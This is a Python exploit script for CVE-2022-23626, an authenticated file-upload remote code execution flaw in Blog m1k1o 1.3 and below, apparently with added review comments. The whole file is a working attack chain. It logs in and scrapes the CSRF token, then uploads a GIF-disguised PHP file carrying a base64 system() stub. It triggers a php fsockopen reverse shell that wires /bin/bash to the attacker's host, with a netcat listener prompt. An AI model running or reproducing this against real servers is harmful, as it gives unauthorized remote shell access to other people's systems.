
# Exploit Title: Blog m1k1o v1.3 – Remote Code Execution (RCE) (Authenticated)
# Date: 2022-01-06
# Exploit Author: Malte V
# Vendor Homepage: https://github.com/m1k1o/blog
# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
# Version: 1.3 and below
# Tested on: Linux
# CVE : CVE-2022-23626

import argparse
import json
import re
from base64 import b64encode

import requests as req
from bs4 import BeautifulSoup

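# Command-line interface. Every option has a default, so running the script
# with no arguments targets localhost:8081 and calls back to 172.17.0.1:9999
# (the Docker bridge address of the original test setup).
parser = argparse.ArgumentParser(
    description="Authenticated RCE file-upload vulnerability for Blog m1k1o (CVE-2022-23626)"
)
# Attacker side: where the uploaded PHP payload connects back to.
parser.add_argument("-ip", "--ip", help="IP address for the reverse shell", type=str,
                    default="172.17.0.1", required=False)
parser.add_argument("-lp", "--lport", help="Listening port for the reverse shell", type=int,
                    default=9999, required=False)
# Target side.
parser.add_argument("-u", "--url", help="URL of the machine without the http:// prefix", type=str,
                    default="localhost", required=False)
parser.add_argument("-p", "--port", help="Port for the Blog", type=int, default=8081,
                    required=False)
# Valid blog credentials: the upload endpoint is only reachable after login.
parser.add_argument("-U", "--username", help="Username for the Blog user", type=str,
                    default="username", required=False)
parser.add_argument("-P", "--password", help="Password for the Blog user", type=str,
                    default="password", required=False)

args = vars(parser.parse_args())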

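# Unpack the parsed options into the module-level names the functions below read.
username = args["username"]
password = args["password"]
lhost_ip = args["ip"]        # attacker address the PHP payload connects back to
lhost_port = args["lport"]   # attacker listening port
address = args["url"]        # target host, no scheme, no port
port = args["port"]
# Plain HTTP only, as in the original exploit; the session cookie and the
# credentials travel in the clear.
url = f"http://{address}:{port}"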

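# Session state filled in while the exploit runs.
blog_cookie = ""        # PHPSESSID obtained by get_cookie()
csrf_token = ""         # CSRF token scraped from the page by grep_csrf()
exploit_file_name = ""  # server-side name of the uploaded PHP file

# NOTE(review): this dict is evaluated once at import time, so its Cookie and
# Csrf-Token values are the empty placeholders above and never the live
# session. None of the request functions below send it -- each builds its own
# header dict. Kept only so existing references to the name keep working.
headers = {
    "Host": f"{address}",
    # The boundary here must match the one used in generate_payload()/send_payload().
    "Content-Type": "multipart/form-data; boundary=" + "-" * 27 + "13148889121752486353560141292",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "X-Requested-With": "XMLHttpRequest",
    "Csrf-Token": f"{csrf_token}",
    "Cookie": f"PHPSESSID={blog_cookie}",
}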

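def get_cookie(complete_url):
    """Fetch *complete_url* to obtain a PHPSESSID and the page's CSRF token.

    Stores the session id in the global ``blog_cookie`` and, through
    ``grep_csrf``, the token in ``csrf_token``.

    Raises RuntimeError when the server does not answer 200 or sets no
    PHPSESSID cookie (the original silently continued with empty state, or
    raised a bare KeyError).
    """
    global blog_cookie
    cookie_header = {}
    # Only send a session cookie when we already hold one. The original
    # tested `not blog_cookie`, i.e. sent an empty "PHPSESSID=" header exactly
    # when there was nothing to send.
    if blog_cookie:
        cookie_header["Cookie"] = f"PHPSESSID={blog_cookie}"
    result = req.get(url=complete_url, headers=cookie_header, timeout=10)
    if result.status_code != 200:
        raise RuntimeError(f"[!] Unexpected status {result.status_code} from {complete_url}")
    session_id = result.cookies.get_dict().get("PHPSESSID")
    if not session_id:
        raise RuntimeError("[!] Server did not set a PHPSESSID cookie")
    blog_cookie = session_id
    print(f"[+] Found PHPSESSID: {blog_cookie}")
    grep_csrf(result)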

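def grep_csrf(result):
    """Extract the CSRF token from *result*'s HTML into global ``csrf_token``.

    The token is taken as the first 10-character lowercase-hex run inside the
    page's second ``<script>`` block. That regex is loose (any 10 hex chars
    would match), so it is tied to the exact layout of Blog m1k1o 1.3.

    Raises RuntimeError when the block or the token is missing, instead of
    the original IndexError/AttributeError on an unexpected page.
    """
    global csrf_token
    csrf_regex = r"[a-f0-9]{10}"
    soup = BeautifulSoup(result.text, "html.parser")
    scripts = soup.find_all("script")
    if len(scripts) < 2 or not scripts[1].contents:
        raise RuntimeError("[!] Unexpected page layout: second <script> block not found")
    match = re.search(csrf_regex, str(scripts[1].contents[0]))
    if match is None:
        raise RuntimeError("[!] CSRF token not found in page")
    csrf_token = match.group(0)
    print(f"[+] Found CSRF-Token: {csrf_token}")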

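def login(username, password):
    """Authenticate against ``/ajax.php`` with the given blog credentials.

    First obtains the session cookie and CSRF token (``get_cookie``), then
    posts the login form with the session cookie and ``Csrf-Token`` header.
    Returns True on success. On a failed login it prints a message and
    raises SystemExit so the exploit does not go on to upload with an
    unauthenticated session (the original only printed and carried on).

    Raises RuntimeError if the endpoint does not answer with JSON.
    """
    get_cookie(url)
    login_url = f"{url}/ajax.php"
    # Let requests form-encode the fields so credentials containing '&', '='
    # or '%' survive; the original concatenated them into the body unescaped.
    login_data = {"action": "login", "nick": username, "pass": password}
    login_header = {
        "Host": f"{address}",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "X-Requested-With": "XMLHttpRequest",
        "Csrf-Token": f"{csrf_token}",
        "Cookie": f"PHPSESSID={blog_cookie}",
    }
    result = req.post(url=login_url, headers=login_header, data=login_data, timeout=10)
    # The endpoint answers with a JSON object whose ``logged_in`` key is the
    # success flag.
    try:
        login_content = result.json()
    except ValueError as exc:
        raise RuntimeError(f"[!] Non-JSON login response: {result.text[:200]!r}") from exc
    if login_content.get("logged_in"):
        print("[*] Successful Login")
        return True
    print("[!] Bad login")
    raise SystemExit(1)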

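def set_cookie(result):
    """Store the PHPSESSID from *result*'s cookies in global ``blog_cookie``.

    *result* is a requests response. Raises RuntimeError when the response
    carries no PHPSESSID (the original raised a bare KeyError).
    """
    global blog_cookie
    session_id = result.cookies.get_dict().get("PHPSESSID")
    if not session_id:
        raise RuntimeError("[!] Response carries no PHPSESSID cookie")
    blog_cookie = session_id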

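# Multipart boundary: 27 hyphens followed by the number. Must be identical to
# the boundary in the Content-Type header sent by send_payload().
PAYLOAD_BOUNDARY = "-" * 27 + "13148889121752486353560141292"


def generate_payload(command):
    """Build the multipart/form-data body that uploads a PHP file running *command*.

    The part is a file named ``malicious.gif.php`` (double extension) with
    content type ``application/x-httpd-php``. Its content starts with a
    ``GIF;`` prefix so it passes as an image, followed by a PHP stub that
    executes *command* when the stored file is requested. The command is
    base64-encoded inside the stub so quotes in it cannot break the PHP
    source (``b64encode`` is imported by the script for this purpose).

    NOTE(review): in the listing this was recovered from the ``<?php ... ?>``
    stub was missing and *command* went unused -- consistent with HTML
    rendering stripping the tag. The stub below restores that step.

    Returns the body as a str; lines are CRLF-terminated per RFC 2046.
    """
    encoded = b64encode(command.encode()).decode()
    php_stub = f'<?php system(base64_decode("{encoded}")); ?>'
    parts = [
        f"--{PAYLOAD_BOUNDARY}",
        'Content-Disposition: form-data; name="file"; filename="malicious.gif.php"',
        "Content-Type: application/x-httpd-php",
        "",
        "GIF;",
        php_stub,
        f"--{PAYLOAD_BOUNDARY}--",
        "",
    ]
    return "\r\n".join(parts)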

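def send_payload():
    """Upload the PHP reverse-shell file through ``/ajax.php?action=upload_image``.

    Uses the session cookie and CSRF token gathered by ``login``. The
    uploaded stub runs a ``php -r`` one-liner that connects back to
    ``lhost_ip``:``lhost_port`` and wires ``/bin/bash`` to the socket. On
    success the server-side file name is stored in global
    ``exploit_file_name`` via ``set_exploit_file_name``.

    Raises RuntimeError on a non-200 reply.

    The original routed this request through a hard-coded proxy at
    127.0.0.1:8080 (Burp), so it failed whenever no proxy was listening.
    requests honours HTTP_PROXY/http_proxy, so export that to get the same
    effect when debugging.
    """
    boundary = "-" * 27 + "13148889121752486353560141292"  # must match generate_payload()
    payload_header = {
        "Host": f"{address}",
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "X-Requested-With": "XMLHttpRequest",
        "Csrf-Token": f"{csrf_token}",
        "Cookie": f"PHPSESSID={blog_cookie}",
    }
    upload_url = f"{url}/ajax.php?action=upload_image"
    # PHP one-liner: open a TCP socket to the listener and attach bash to it.
    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"
    payload = generate_payload(command)
    print("[+] Upload exploit")
    # Send bytes so Content-Length is computed on the encoded body.
    result = req.post(url=upload_url, headers=payload_header, data=payload.encode(), timeout=10)
    if result.status_code != 200:
        raise RuntimeError(f"[!] Upload failed with status {result.status_code}: {result.text[:200]!r}")
    set_exploit_file_name(result.content.decode("ascii", errors="replace"))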

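def set_exploit_file_name(data):
    """Parse the upload reply *data* for the stored file name into global ``exploit_file_name``.

    The name is expected as 4-5 alphanumerics followed by ``.php`` (the dot
    is escaped here; the original regex used a bare ``.``). Raises
    RuntimeError with a snippet of the reply when nothing matches, instead
    of the original AttributeError on ``None``.
    """
    global exploit_file_name
    file_regex = r"[a-zA-Z0-9]{4,5}\.php"
    match = re.search(file_regex, data)
    if match is None:
        raise RuntimeError(f"[!] Upload reply did not contain a .php file name: {data[:200]!r}")
    exploit_file_name = match.group(0)
    print(f"[+] Uploaded file stored as: {exploit_file_name}")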

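def call_malicious_php(file_name):
    """Request the uploaded file under ``/data/i/`` so the server executes it.

    The script expects the stored upload at ``{url}/data/i/<file_name>``;
    fetching it triggers the PHP stub and therefore the reverse shell. No
    timeout is set on purpose: the PHP process, and with it this HTTP
    request, stays open for as long as the reverse shell is alive, so a
    timeout here would only produce a spurious exception.
    """
    complete_url = f"{url}/data/i/{file_name}"
    print("[*] Calling reverse shell")
    req.get(url=complete_url)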

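def check_reverse_shell():
    """Ask the operator whether a listener is ready; return True only on "yes".

    Empty input counts as yes. The answer is stripped and lower-cased so
    ``Y``/``N`` work (the original's set lookup was case-sensitive and
    silently returned None for anything outside its two sets). Any answer
    other than yes prints the netcat hint and returns False.
    """
    yes = {"yes", "y", "ye", ""}
    choice = input("Do you have an active netcat listener (y/Y or n/N): ").strip().lower()
    if choice in yes:
        return True
    print(f"[!] Please open a netcat listener with \"nc -lnvp {lhost_port}\"")
    return False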

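def main():
    """Run the chain: listener check -> login -> upload -> trigger the shell.

    Stops before touching the target when the operator has no listener
    ready, since the uploaded stub would otherwise fire into nothing.
    """
    listener_ready = check_reverse_shell()
    if not listener_ready:
        return
    login(username, password)
    send_payload()
    call_malicious_php(exploit_file_name)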

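# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()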
